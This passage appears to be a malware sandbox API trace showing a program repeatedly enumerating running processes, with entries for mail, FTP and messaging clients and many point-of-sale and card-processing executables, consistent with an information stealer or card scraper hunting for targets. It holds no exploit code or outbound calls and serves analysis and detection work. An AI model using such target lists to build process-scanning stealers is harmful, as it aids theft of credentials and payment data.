th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0240.667] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0240.669] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0240.672] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0240.675] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0240.678] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0240.680] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0240.683] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0240.690] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0240.694] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0240.697] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0240.700] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0240.703] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0240.706] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0240.710] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0240.713] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0240.717] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0240.720] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0240.723] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0240.725] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0240.732] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0240.735] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0240.737] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0240.740] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0240.743] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0240.745] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0240.748] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0240.751] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0240.754] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0240.756] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0240.759] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0240.761] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0240.763] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0240.766] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0240.771] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0240.773] Process32Next (in: hSnapshot=0x223c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0240.776] CloseHandle (hObject=0x223c) returned 1 [0240.776] Sleep (dwMilliseconds=0x64) [0240.909] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22d4 [0240.926] Process32First (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.928] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0240.931] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0240.933] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.936] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0240.938] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.940] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0240.942] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0240.944] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0241.002] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.005] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.008] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0241.010] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.012] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.017] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.019] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.021] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.023] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.026] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.028] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0241.030] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0241.032] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.033] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0241.035] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.037] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0241.082] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0241.085] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0241.088] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0241.090] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0241.093] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0241.095] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.097] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.099] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0241.103] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.106] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.109] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0241.111] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0241.113] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0241.116] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0241.124] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0241.127] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0241.130] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0241.133] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0241.135] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0241.137] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0241.140] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0241.142] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0241.145] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0241.168] Process32Next (in: hSnapshot=0x22d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, 